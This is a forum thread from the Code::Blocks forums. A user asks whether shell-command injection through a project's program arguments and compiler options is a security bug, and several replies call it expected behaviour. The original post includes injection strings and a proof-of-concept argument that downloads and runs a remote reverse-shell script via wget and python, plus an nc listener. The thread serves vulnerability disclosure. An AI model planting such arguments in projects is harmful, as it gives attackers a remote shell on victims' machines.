User forums > General (but related to Code::Blocks)

Is this maybe a security problem?

(1/2) > >>

hrkljus:
Hi, I'm new here and I wasn't sure where to post this.

I'm wondering if the following would be considered a security problem, and if it's worth reporting it as a bug:

In a Code::Blocks project, it is possible to inject shell commands via the "Set programs' arguments" option, e.g. setting the programs arguments to "; ls" and pressing F9 in a default Hello World project will result in the following output:


--- Code: ---Hello world!
bin  hello.cbp  hello.depend  main.cpp  obj

Process returned 0 (0x0)   execution time : 0.013 s
Press ENTER to continue.

--- End code ---

Same can be done with compiler options, though it's a bit trickier. Setting "|| ls #" as the first compiler option will make the compilation fail, though the command ("ls") will still get executed.

Now on one hand, this may be expected and nothing unusual, but on the other hand it can be used to hide malicious code in a Code::Blocks project which will get executed once the victim compiles/runs it.

Here's an attack scenario:

An attacker creates a Code::Blocks project with some clean source code, but set's up the compile options/program arguments so that it would give him a reverse shell.
He then distributes the project, and the victims that compile/run it unknowingly give him access to their computer.

I've created a simple proof of concept - a Hello World project in C++ that, once run, creates a reverse shell that connects to localhost:12345.

You can test it out on a Linux/Unix system by creating a listener in a terminal first:


--- Code: ---nc -vlp 12345
--- End code ---

And then running the project with F9.
Once run, you should have a shell on your listener terminal.

The program arguments are set up like this:


--- Code: ---; wget -qO /tmp/r.py http://pastebin.com/raw/mMfKfkUU && python /tmp/r.py
--- End code ---

Which will download a python script with a simple reverse shell that forks to the background so that the program normally finishes once run from Code::Blocks.

Here's a screenshot:


Is this something worth reporting or is it simply and accepted risk/expected behavior?

EDIT: Forgot to attach the proof of concept project.

oBFusCATed:
Can a user find the problem by inspecting the project with a text editor or using cb's guis?

dmoore:
Expected behavior I would say. Aka, don't run projects from untrusted sources  :o

I think the only security risks that we have to worry about are malware, privilege escalation or network backdoor bugs that are somehow baked into the IDE itself. Just like you don't blame the terminal for crap people might run in it, the IDE can't be blamed for crap people put into projects.

raynebc:
Same risk somebody could get by running untrusted build scripts or makefiles?

yvesdm3000:
And what about the compiled code? Once you execute it, it can also whatever the programmer wrote...

Yves

Navigation

[0] Message Index

[#] Next page